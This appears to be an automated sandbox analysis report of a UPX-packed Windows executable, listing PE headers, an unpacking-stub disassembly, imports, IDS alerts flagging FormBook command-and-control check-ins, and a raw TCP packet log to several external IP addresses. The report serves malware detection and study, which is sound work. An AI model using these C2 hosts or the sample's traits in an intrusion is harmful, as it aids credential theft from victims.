                                                                            Icon Hash:aaf3e3e3938382a0

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x537a10
                                                                            Entrypoint Section:UPX1
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6752FFCA [Fri Dec 6 13:44:42 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:1
                                                                            File Version Major:5
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:fc6683d30d9f25244a50fd5357825e79

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            pushad
                                                                            mov esi, 004E2000h
                                                                            lea edi, dword ptr [esi-000E1000h]
                                                                            push edi
                                                                            jmp 00007F73C50BD01Dh
                                                                            nop
                                                                            mov al, byte ptr [esi]
                                                                            inc esi
                                                                            mov byte ptr [edi], al
                                                                            inc edi
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jc 00007F73C50BCFFFh
                                                                            mov eax, 00000001h
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc eax, eax
                                                                            add ebx, ebx
                                                                            jnc 00007F73C50BD01Dh
                                                                            jne 00007F73C50BD03Ah
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jc 00007F73C50BD031h
                                                                            dec eax
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc eax, eax
                                                                            jmp 00007F73C50BCFE6h
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc ecx, ecx
                                                                            jmp 00007F73C50BD064h
                                                                            xor ecx, ecx
                                                                            sub eax, 03h
                                                                            jc 00007F73C50BD023h
                                                                            shl eax, 08h
                                                                            mov al, byte ptr [esi]
                                                                            inc esi
                                                                            xor eax, FFFFFFFFh
                                                                            je 00007F73C50BD087h
                                                                            sar eax, 1
                                                                            mov ebp, eax
                                                                            jmp 00007F73C50BD01Dh
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jc 00007F73C50BCFDEh
                                                                            inc ecx
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jc 00007F73C50BCFD0h
                                                                            add ebx, ebx
                                                                            jne 00007F73C50BD019h
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            adc ecx, ecx
                                                                            add ebx, ebx
                                                                            jnc 00007F73C50BD001h
                                                                            jne 00007F73C50BD01Bh
                                                                            mov ebx, dword ptr [esi]
                                                                            sub esi, FFFFFFFCh
                                                                            adc ebx, ebx
                                                                            jnc 00007F73C50BCFF6h
                                                                            add ecx, 02h
                                                                            cmp ebp, FFFFFB00h
                                                                            adc ecx, 02h
                                                                            lea edx, dword ptr [edi+ebp]
                                                                            cmp ebp, FFFFFFFCh
                                                                            jbe 00007F73C50BD020h
                                                                            mov al, byte ptr [edx]

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [ASM] VS2013 build 21005
                                                                            • [ C ] VS2013 build 21005
                                                                            • [C++] VS2013 build 21005
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            • [ASM] VS2013 UPD4 build 31101
                                                                            • [RES] VS2013 build 21005
                                                                            • [LNK] VS2013 UPD4 build 31101

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1973740x424.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1380000x5f374.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1977980xc.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x137bf40x48UPX1
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            UPX00x10000xe10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            UPX10xe20000x560000x55e001a845b7283cfbb844ef9e3f3dfb24b5eFalse0.98709288573508data7.935245773281257IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x1380000x600000x5f800b0c12ccabab10c1434dc9923e4be767fFalse0.9471378026832461data7.935757111911807IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x1385ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                            RT_ICON0x1386d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                            RT_ICON0x1388040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                            RT_ICON0x1389300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                            RT_ICON0x138c1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                            RT_ICON0x138d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                            RT_ICON0x139bf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                            RT_ICON0x13a4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                            RT_ICON0x13aa0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                            RT_ICON0x13cfb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                            RT_ICON0x13e0640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                            RT_MENU0xcd4a00x50emptyEnglishGreat Britain0
                                                                            RT_STRING0xcd4f00x594emptyEnglishGreat Britain0
                                                                            RT_STRING0xcda840x68aemptyEnglishGreat Britain0
                                                                            RT_STRING0xce1100x490emptyEnglishGreat Britain0
                                                                            RT_STRING0xce5a00x5fcemptyEnglishGreat Britain0
                                                                            RT_STRING0xceb9c0x65cemptyEnglishGreat Britain0
                                                                            RT_STRING0xcf1f80x466emptyEnglishGreat Britain0
                                                                            RT_STRING0xcf6600x158emptyEnglishGreat Britain0
                                                                            RT_RCDATA0x13e4d00x58909data1.0003335529453277
                                                                            RT_GROUP_ICON0x196de00x76dataEnglishGreat Britain0.6610169491525424
                                                                            RT_GROUP_ICON0x196e5c0x14dataEnglishGreat Britain1.25
                                                                            RT_GROUP_ICON0x196e740x14dataEnglishGreat Britain1.15
                                                                            RT_GROUP_ICON0x196e8c0x14dataEnglishGreat Britain1.25
                                                                            RT_VERSION0x196ea40xdcdataEnglishGreat Britain0.6181818181818182
                                                                            RT_MANIFEST0x196f840x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                                            ADVAPI32.dllGetAce
                                                                            COMCTL32.dllImageList_Remove
                                                                            COMDLG32.dllGetOpenFileNameW
                                                                            GDI32.dllLineTo
                                                                            IPHLPAPI.DLLIcmpSendEcho
                                                                            MPR.dllWNetUseConnectionW
                                                                            ole32.dllCoGetObject
                                                                            OLEAUT32.dllVariantInit
                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                            SHELL32.dllDragFinish
                                                                            USER32.dllGetDC
                                                                            USERENV.dllLoadUserProfileW
                                                                            UxTheme.dllIsThemeActive
                                                                            VERSION.dllVerQueryValueW
                                                                            WININET.dllFtpOpenFileW
                                                                            WINMM.dlltimeGetTime
                                                                            WSOCK32.dllconnect

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishGreat Britain

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-06T17:36:06.305032+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.124971513.248.169.4880TCP
                                                                            2024-12-06T17:36:06.305032+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.124971513.248.169.4880TCP
                                                                            2024-12-06T17:36:23.170513+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124971713.248.169.4880TCP
                                                                            2024-12-06T17:36:25.846030+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124971813.248.169.4880TCP
                                                                            2024-12-06T17:36:28.509256+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124971913.248.169.4880TCP
                                                                            2024-12-06T17:36:31.168424+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.124972013.248.169.4880TCP
                                                                            2024-12-06T17:36:31.168424+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.124972013.248.169.4880TCP
                                                                            2024-12-06T17:36:37.927439+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124972184.32.84.3280TCP
                                                                            2024-12-06T17:36:41.074454+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124972284.32.84.3280TCP
                                                                            2024-12-06T17:36:41.074454+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.124972284.32.84.3280TCP
                                                                            2024-12-06T17:36:43.742873+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124972384.32.84.3280TCP
                                                                            2024-12-06T17:36:46.399948+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.124972484.32.84.3280TCP
                                                                            2024-12-06T17:36:46.399948+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.124972484.32.84.3280TCP
                                                                            2024-12-06T17:36:52.946445+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124972584.32.84.3280TCP
                                                                            2024-12-06T17:36:55.615860+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124972684.32.84.3280TCP
                                                                            2024-12-06T17:36:58.286505+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124972884.32.84.3280TCP
                                                                            2024-12-06T17:37:00.952886+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.124973484.32.84.3280TCP
                                                                            2024-12-06T17:37:00.952886+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.124973484.32.84.3280TCP
                                                                            2024-12-06T17:37:08.102346+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249750209.74.77.10780TCP
                                                                            2024-12-06T17:37:10.857515+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249756209.74.77.10780TCP
                                                                            2024-12-06T17:37:13.493688+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249767209.74.77.10780TCP
                                                                            2024-12-06T17:37:16.122569+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1249772209.74.77.10780TCP
                                                                            2024-12-06T17:37:16.122569+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249772209.74.77.10780TCP
                                                                            2024-12-06T17:37:23.333261+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124978938.47.207.16480TCP
                                                                            2024-12-06T17:37:26.005118+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124979438.47.207.16480TCP
                                                                            2024-12-06T17:37:28.676989+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.124980038.47.207.16480TCP
                                                                            2024-12-06T17:37:31.396749+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.124980938.47.207.16480TCP
                                                                            2024-12-06T17:37:31.396749+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.124980938.47.207.16480TCP
                                                                            2024-12-06T17:37:38.720332+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249827208.115.225.22080TCP
                                                                            2024-12-06T17:37:41.387774+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249833208.115.225.22080TCP
                                                                            2024-12-06T17:37:44.066273+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249843208.115.225.22080TCP
                                                                            2024-12-06T17:37:46.782408+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1249849208.115.225.22080TCP
                                                                            2024-12-06T17:37:46.782408+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249849208.115.225.22080TCP
                                                                            2024-12-06T17:38:02.677034+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249886172.67.162.3980TCP
                                                                            2024-12-06T17:38:05.348890+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249892172.67.162.3980TCP
                                                                            2024-12-06T17:38:08.020986+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249898172.67.162.3980TCP
                                                                            2024-12-06T17:38:11.822163+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1249908172.67.162.3980TCP
                                                                            2024-12-06T17:38:11.822163+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249908172.67.162.3980TCP
                                                                            2024-12-06T17:38:18.925603+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249929199.59.243.22780TCP
                                                                            2024-12-06T17:38:21.596177+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249935199.59.243.22780TCP
                                                                            2024-12-06T17:38:24.271865+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249941199.59.243.22780TCP
                                                                            2024-12-06T17:38:26.939013+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1249948199.59.243.22780TCP
                                                                            2024-12-06T17:38:26.939013+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249948199.59.243.22780TCP
                                                                            2024-12-06T17:38:33.912697+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249964199.59.243.22780TCP
                                                                            2024-12-06T17:38:36.585064+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249973199.59.243.22780TCP
                                                                            2024-12-06T17:38:39.269011+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1249979199.59.243.22780TCP
                                                                            2024-12-06T17:38:41.949933+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1249985199.59.243.22780TCP
                                                                            2024-12-06T17:38:41.949933+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1249985199.59.243.22780TCP
                                                                            2024-12-06T17:38:48.529809+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1250001104.21.90.13780TCP
                                                                            2024-12-06T17:38:51.231199+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1250007104.21.90.13780TCP
                                                                            2024-12-06T17:38:53.956005+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1250016104.21.90.13780TCP
                                                                            2024-12-06T17:38:56.546963+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1250021104.21.90.13780TCP
                                                                            2024-12-06T17:38:56.546963+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1250021104.21.90.13780TCP
                                                                            2024-12-06T17:39:03.765359+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1250022108.179.253.19780TCP
                                                                            2024-12-06T17:39:06.469988+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1250023108.179.253.19780TCP
                                                                            2024-12-06T17:39:09.095603+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1250024108.179.253.19780TCP
                                                                            2024-12-06T17:39:11.802745+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1250025108.179.253.19780TCP
                                                                            2024-12-06T17:39:11.802745+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1250025108.179.253.19780TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 6, 2024 17:36:05.074382067 CET4971580192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:05.194303036 CET804971513.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:05.194386959 CET4971580192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:05.205074072 CET4971580192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:05.324923992 CET804971513.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:06.304842949 CET804971513.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:06.304984093 CET804971513.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:06.305032015 CET4971580192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:06.308254004 CET4971580192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:06.428906918 CET804971513.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:21.945812941 CET4971780192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:22.066250086 CET804971713.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:22.066431999 CET4971780192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:22.082973957 CET4971780192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:22.203465939 CET804971713.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:23.170094967 CET804971713.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:23.170438051 CET804971713.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:23.170512915 CET4971780192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:23.598789930 CET4971780192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:24.617774963 CET4971880192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:24.738590002 CET804971813.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:24.738729000 CET4971880192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:24.754694939 CET4971880192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:24.874525070 CET804971813.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:25.845731020 CET804971813.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:25.845947981 CET804971813.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:25.846029997 CET4971880192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:26.271442890 CET4971880192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:27.289206982 CET4971980192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:27.409149885 CET804971913.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:27.409282923 CET4971980192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:27.424245119 CET4971980192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:27.544271946 CET804971913.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:27.544286966 CET804971913.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:28.509149075 CET804971913.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:28.509166956 CET804971913.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:28.509255886 CET4971980192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:28.926934958 CET4971980192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:29.945970058 CET4972080192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:30.066020012 CET804972013.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:30.066119909 CET4972080192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:30.076904058 CET4972080192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:30.197007895 CET804972013.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:31.168250084 CET804972013.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:31.168363094 CET804972013.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:31.168423891 CET4972080192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:31.171366930 CET4972080192.168.2.1213.248.169.48
                                                                            Dec 6, 2024 17:36:31.291049957 CET804972013.248.169.48192.168.2.12
                                                                            Dec 6, 2024 17:36:36.704046965 CET4972180192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:36.824460030 CET804972184.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:36.824618101 CET4972180192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:36.840020895 CET4972180192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:36.959868908 CET804972184.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:37.927352905 CET804972184.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:37.927438974 CET4972180192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:38.348984003 CET4972180192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:38.468983889 CET804972184.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:39.368755102 CET4972280192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:39.975318909 CET804972284.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:39.975394011 CET4972280192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:39.990334988 CET4972280192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:40.110306025 CET804972284.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:41.074378967 CET804972284.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:41.074454069 CET4972280192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:41.505093098 CET4972280192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:41.625252962 CET804972284.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:42.524367094 CET4972380192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:42.644320011 CET804972384.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:42.644591093 CET4972380192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:42.660023928 CET4972380192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:42.780117035 CET804972384.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:42.780159950 CET804972384.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:43.742752075 CET804972384.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:43.742872953 CET4972380192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:44.161521912 CET4972380192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:44.281409979 CET804972384.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:45.180973053 CET4972480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:45.301024914 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:45.301948071 CET4972480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:45.312066078 CET4972480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:45.432061911 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.399652958 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.399677038 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.399691105 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.399732113 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.399786949 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.399799109 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.399811983 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.399947882 CET4972480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:46.400084019 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.400090933 CET4972480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:46.400095940 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.400110960 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:46.400177002 CET4972480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:46.404975891 CET4972480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:46.524832964 CET804972484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:51.722048044 CET4972580192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:51.842685938 CET804972584.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:51.846537113 CET4972580192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:51.862488985 CET4972580192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:51.982508898 CET804972584.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:52.946383953 CET804972584.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:52.946444988 CET4972580192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:53.364407063 CET4972580192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:53.484344006 CET804972584.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:54.383452892 CET4972680192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:54.503344059 CET804972684.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:54.503432989 CET4972680192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:54.524584055 CET4972680192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:54.644839048 CET804972684.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:55.615740061 CET804972684.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:55.615859985 CET4972680192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:56.036398888 CET4972680192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:56.157113075 CET804972684.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:57.056530952 CET4972880192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:57.176884890 CET804972884.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:57.176989079 CET4972880192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:57.195537090 CET4972880192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:57.315684080 CET804972884.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:57.315731049 CET804972884.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:58.282422066 CET804972884.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:58.286504984 CET4972880192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:58.708317995 CET4972880192.168.2.1284.32.84.32
